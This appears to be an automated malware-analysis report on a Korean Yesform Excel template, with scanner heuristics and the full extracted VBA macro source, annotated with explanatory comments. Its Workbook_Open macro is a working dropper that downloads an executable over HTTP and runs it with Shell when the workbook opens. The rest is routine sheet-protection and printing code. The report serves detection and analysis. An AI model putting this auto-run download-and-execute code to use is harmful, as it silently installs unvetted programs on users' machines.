MALICIOUS
230
Risk Score
Heuristics 7
-
ClamAV: Doc.Macro.GenericHeuristic-5931846-4 critical CLAMAV_DETECTION — ClamAV detected this file as malware: Doc.Macro.GenericHeuristic-5931846-4
-
VBA macros detected medium 4 related findings OLE_VBA_MACROS — Document contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELL — Potential Shell call in VBA. Matched line in script:
Shell "C:\sMessenger\searchMessenger_upgrade_x.exe" -
CreateObject call high OLE_VBA_CREATEOBJ — CreateObject call. Matched line in script:
Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC — Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPEN — Workbook_Open macro. Matched line in script:
Private Sub Workbook_Open() -
Embedded URL info EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
- http://ns.adobe.com/xap/1.0/ — In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns# — In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/ — In document text (OLE body)
- http://ns.adobe.com/exif/1.0/ — In document text (OLE body)
- http://purl.org/dc/elements/1.1/ — In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/ — In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/ — In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent# — In document text (OLE body)
- http://www.iec.ch — In document text (OLE body)
- http://www.yesform.com/z_n/forms/search.php?q= — In document text (OLE body)
- http://www.yesform.com/active/searchMessenger/dw.php?mode=etc — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7929 bytes |
| SHA-256: 8905f8ff5040c289b256abb2f55d503d845ab73dc6bf19cc8a45889fba21ace9 | | | |
Preview script — First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
' Auto-execution entry point: Excel runs this as soon as the workbook is opened with macros enabled.
' Dropper chain: presence check -> HTTP download (File_DownLoad) -> Shell of the downloaded file.
' The existence check looks for searchMessenger.exe, but the file that is downloaded and executed is
' searchMessenger_upgrade_x.exe, so the download-and-run step repeats on every open until the first file exists.
' File_DownLoad's Boolean result is discarded (and the function never assigns one), so Shell runs whether or not
' the download succeeded. Detection: the Workbook_Open + XMLHTTP + binary file write + Shell pairing is the
' signal the report's OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic keys on.
If Dir("C:\sMessenger\searchMessenger.exe") = "" Then
File_DownLoad "http://www.yesform.com/active/searchMessenger/dw.php?mode=etc", "C:\sMessenger" & "\searchMessenger_upgrade_x.exe"
Shell "C:\sMessenger\searchMessenger_upgrade_x.exe"
End If
End Sub
Function File_DownLoad(ByVal SLocalFile As String, ByVal DLocalFile As String) As Boolean
' Fetches a URL with a synchronous MSXML2.XMLHTTP GET and writes the raw response body to a local file.
' The parameter names are misleading: SLocalFile is the URL to fetch, DLocalFile the destination path.
' Return value: declared Boolean but never assigned, so callers always receive False regardless of outcome.
' There is no On Error handler, so any failure in Open/Send or in the file I/O surfaces as a run-time error
' in the caller. The HTTP status is never inspected and the payload is not validated, so whatever bytes the
' server returns (an error page included) are written to disk and, in Workbook_Open, executed.
Dim oXMLHTTP As Object, DFile As Long, oResp() As Byte, FS As Object
Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP")   ' late-bound; plain HTTP, no TLS, no certificate checks
Set FS = CreateObject("Scripting.FileSystemObject")
oXMLHTTP.Open "GET", SLocalFile, False          ' third argument False = synchronous request
oXMLHTTP.Send
Do While oXMLHTTP.ReadyState <> 4               ' with a synchronous Send this should already be satisfied; kept as a wait loop
DoEvents
Loop
oResp = oXMLHTTP.ResponseBody                   ' raw bytes, written as received
If FS.FolderExists("C:\sMessenger") = False Then MkDir "C:\sMessenger"
DFile = FreeFile
If Dir(DLocalFile) <> "" Then Kill DLocalFile   ' unconditionally overwrite an existing file
Open DLocalFile For Binary As #DFile
Put #DFile, , oResp
Close #DFile
Set oXMLHTTP = Nothing
Set FS = Nothing
End Function
Attribute VB_Name = "Module1"
' Title used for the template's message boxes (Korean vendor banner for Yesform).
Public Const Banner As String = "국내최대 문서서식 예스폼 (www.yesform.com)"
Sub Move_Sheet1()
' Brings Sheet1 to the front.
With Sheet1
.Activate
End With
End Sub
Sub Move_Sheet2()
' Brings Sheet2 to the front.
With Sheet2
.Activate
End With
End Sub
Sub 시트보호()
' Switches the active sheet into protected mode and tells the user.
Sheet_protect
MsgBox Prompt:="시트보호모드로 전환되었습니다.", Buttons:=vbInformation, Title:=Banner
End Sub
Sub 시트해제()
' Asks the user to confirm before lifting sheet protection; a "No" answer leaves the sheet untouched.
Dim answer As VbMsgBoxResult
answer = MsgBox(Prompt:="본 컨텐츠는 시트보호모드에서 정상적으로 사용할 수 있도록 구성되었습니다." & Chr(13) & "보호 해제 후 임의 수정에 따라 발생하는 컨텐츠 오류 및 손상에 대하여 예스폼(Yesform)이 책임지지 않음을 알려드립니다." & Chr(13) & "시트보호모드를 해제하시겠습니까?", Buttons:=vbYesNo, Title:=Banner)
If answer <> vbYes Then Exit Sub
Sheet_unprotect
End Sub
Sub P_preview()
' Shows print preview for the active sheet.
With ActiveSheet
.PrintPreview
End With
End Sub
Sub P_out()
' Sends the active sheet to the printer.
With ActiveSheet
.PrintOut
End With
End Sub
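Sub Sheet_protect()
' Protects the active sheet with the template password while still allowing formatting,
' hyperlink insertion, sorting and filtering.
' Fix: the original wrote "Password = 1234". Without ":=" VBA parses that as the comparison
' (Password = 1234) against an undeclared, empty variable and passes the resulting False as the
' positional Password argument, so the sheet was never protected with the intended value. The
' named-argument form passes the password itself. Sheet_unprotect must use the same value.
ActiveSheet.Protect Password:=1234, DrawingObjects:=True, Contents:=True, Scenarios:=True, _
AllowFormattingCells:=True, AllowFormattingColumns:=True, AllowFormattingRows:=True, _
AllowInsertingHyperlinks:=True, AllowSorting:=True, AllowFiltering:=True
End Sub
Sub Sheet_unprotect()
' Lifts the protection applied by Sheet_protect (same fix: named argument instead of a comparison).
ActiveSheet.Unprotect Password:=1234
End Sub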
Sub P_preview_add()
' Print preview of the active sheet. When no filter is active, temporarily lifts protection,
' filters column 5 to non-blank rows for the preview, then restores the full view and protection.
Application.ScreenUpdating = False
If Not ActiveSheet.FilterMode Then
Sheet_unprotect
Selection.AutoFilter Field:=5, Criteria1:="<>"
ActiveSheet.PrintPreview
ActiveSheet.ShowAllData
Sheet_protect
Else
ActiveSheet.PrintPreview
End If
Application.ScreenUpdating = True
End Sub
Sub P_out_add()
' Prints the active sheet. When no filter is active, temporarily lifts protection,
' filters column 5 to non-blank rows for the printout, then restores the full view and protection.
Application.ScreenUpdating = False
If Not ActiveSheet.FilterMode Then
Sheet_unprotect
Selection.AutoFilter Field:=5, Criteria1:="<>"
ActiveSheet.PrintOut
ActiveSheet.ShowAllData
Sheet_protect
Else
ActiveSheet.PrintOut
End If
Application.ScreenUpdating = True
End Sub
Sub Search()
' Opens the vendor's form search in the current browser window, using the text in TextBox1 as the query.
' The text box value is appended to the URL as-is (no URL encoding is applied).
Dim target As String
target = "http://www.yesform.com/z_n/forms/search.php?q=" & ActiveSheet.TextBox1
ThisWorkbook.FollowHyperlink Address:=target, NewWindow:=False
End Sub
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 38, 0, MSForms, TextBox"
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 25, 0, MSForms, TextBox"
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module2"
Sub PicInsert()
' Lets the user pick a picture through Excel's Insert Picture dialog and places it in a fixed frame at B7.
' Sheet protection is lifted for the duration and restored at the end.
Dim pic As Boolean
Sheet_unprotect
On Error Resume Next            ' from here to End Sub every error is silently ignored (missing shape, cancelled dialog, ...)
Sheet2.Shapes(23).Delete        ' removes the previously inserted picture; assumes it is shape index 23 on Sheet2 — TODO confirm
pic = Application.Dialogs(xlDialogInsertPicture).Show   ' True when the dialog completed with an insertion
If pic = True Then
' Position and size the newly inserted (still selected) picture relative to cell B7.
Selection.Top = Range("b7").Top
Selection.Left = Range("b7").Left
Selection.Width = 88
Selection.Height = 115
Selection.ShapeRange.IncrementLeft 3.75
Selection.ShapeRange.IncrementTop 1.5
End If
Call Sheet_protect
End Sub
Sub DropC1()
' Copies the row block selected in drop-down "drop1" from Sheet3 over row 15 of the active sheet.
' Source rows sit two per choice, three rows apart on Sheet3. Runs with protection lifted and
' screen updating paused; re-protects before returning.
Dim sel As Long
Dim firstRow As Long, lastRow As Long
Application.ScreenUpdating = False
Call Sheet_unprotect
sel = ActiveSheet.DropDowns("drop1").ListIndex
firstRow = (sel + 1) * 3 + 2
lastRow = (sel + 2) * 3
' NOTE(review): Range() built from Sheet3 cells while another sheet is active relies on Excel resolving the pair on Sheet3 — confirm.
Range(Sheet3.Cells(firstRow, 1), Sheet3.Cells(lastRow, 1)).EntireRow.Copy
ActiveSheet.Rows(15).Select
ActiveSheet.Paste
Application.CutCopyMode = False
ActiveSheet.Range("b15").Select
Call Sheet_protect
Application.ScreenUpdating = True
End Sub
Sub DropC2()
' Copies the row block selected in drop-down "drop2" from Sheet3 over row 19 of the active sheet.
' Source rows sit five per choice, six rows apart on Sheet3. Runs with protection lifted and
' screen updating paused; re-protects before returning.
Dim sel As Long
Dim firstRow As Long, lastRow As Long
Application.ScreenUpdating = False
Call Sheet_unprotect
sel = ActiveSheet.DropDowns("drop2").ListIndex
firstRow = (sel + 3) * 6 + 2
lastRow = (sel + 4) * 6
' NOTE(review): Range() built from Sheet3 cells while another sheet is active relies on Excel resolving the pair on Sheet3 — confirm.
Range(Sheet3.Cells(firstRow, 1), Sheet3.Cells(lastRow, 1)).EntireRow.Copy
ActiveSheet.Rows(19).Select
ActiveSheet.Paste
Application.CutCopyMode = False
ActiveSheet.Range("b19").Select
Call Sheet_protect
Application.ScreenUpdating = True
End Sub
Sub DropC3()
' Copies the row block selected in drop-down "drop3" from Sheet3 over row 26 of the active sheet.
' Source rows sit five per choice, six rows apart on Sheet3. Runs with protection lifted and
' screen updating paused; re-protects before returning.
Dim sel As Long
Dim firstRow As Long, lastRow As Long
Application.ScreenUpdating = False
Call Sheet_unprotect
sel = ActiveSheet.DropDowns("drop3").ListIndex
firstRow = (sel + 9) * 6 - 1
lastRow = (sel + 9) * 6 + 3
' NOTE(review): Range() built from Sheet3 cells while another sheet is active relies on Excel resolving the pair on Sheet3 — confirm.
Range(Sheet3.Cells(firstRow, 1), Sheet3.Cells(lastRow, 1)).EntireRow.Copy
ActiveSheet.Rows(26).Select
ActiveSheet.Paste
Application.CutCopyMode = False
ActiveSheet.Range("b26").Select
Call Sheet_protect
Application.ScreenUpdating = True
End Sub
Sub DropC4()
' Copies the row block selected in drop-down "drop4" from Sheet3 over row 33 of the active sheet.
' Source rows sit four per choice, five rows apart on Sheet3. Runs with protection lifted and
' screen updating paused; re-protects before returning.
Dim sel As Long
Dim firstRow As Long, lastRow As Long
Application.ScreenUpdating = False
Call Sheet_unprotect
sel = ActiveSheet.DropDowns("drop4").ListIndex
firstRow = (sel + 17) * 5 + 2
lastRow = (sel + 18) * 5
' NOTE(review): Range() built from Sheet3 cells while another sheet is active relies on Excel resolving the pair on Sheet3 — confirm.
Range(Sheet3.Cells(firstRow, 1), Sheet3.Cells(lastRow, 1)).EntireRow.Copy
ActiveSheet.Rows(33).Select
ActiveSheet.Paste
Application.CutCopyMode = False
ActiveSheet.Range("b33").Select
Call Sheet_protect
Application.ScreenUpdating = True
End Sub
Sub DropC5()
' Copies the row block selected in drop-down "drop5" from Sheet3 over row 39 of the active sheet.
' Source rows sit five per choice, six rows apart on Sheet3. Runs with protection lifted and
' screen updating paused; re-protects before returning.
Dim sel As Long
Dim firstRow As Long, lastRow As Long
Application.ScreenUpdating = False
Call Sheet_unprotect
sel = ActiveSheet.DropDowns("drop5").ListIndex
firstRow = (sel + 19) * 6
lastRow = (sel + 20) * 6 - 2
' NOTE(review): Range() built from Sheet3 cells while another sheet is active relies on Excel resolving the pair on Sheet3 — confirm.
Range(Sheet3.Cells(firstRow, 1), Sheet3.Cells(lastRow, 1)).EntireRow.Copy
ActiveSheet.Rows(39).Select
ActiveSheet.Paste
Application.CutCopyMode = False
ActiveSheet.Range("b39").Select
Call Sheet_protect
Application.ScreenUpdating = True
End Sub
Sub DropC6()
' Copies the row block selected in drop-down "drop6" from Sheet3 over row 46 of the active sheet.
' Source rows sit five per choice, six rows apart on Sheet3. Runs with protection lifted and
' screen updating paused; re-protects before returning.
Dim sel As Long
Dim firstRow As Long, lastRow As Long
Application.ScreenUpdating = False
Call Sheet_unprotect
sel = ActiveSheet.DropDowns("drop6").ListIndex
firstRow = (sel + 24) * 6 + 3
lastRow = (sel + 25) * 6 + 1
' NOTE(review): Range() built from Sheet3 cells while another sheet is active relies on Excel resolving the pair on Sheet3 — confirm.
Range(Sheet3.Cells(firstRow, 1), Sheet3.Cells(lastRow, 1)).EntireRow.Copy
ActiveSheet.Rows(46).Select
ActiveSheet.Paste
Application.CutCopyMode = False
ActiveSheet.Range("b46").Select
Call Sheet_protect
Application.ScreenUpdating = True
End Sub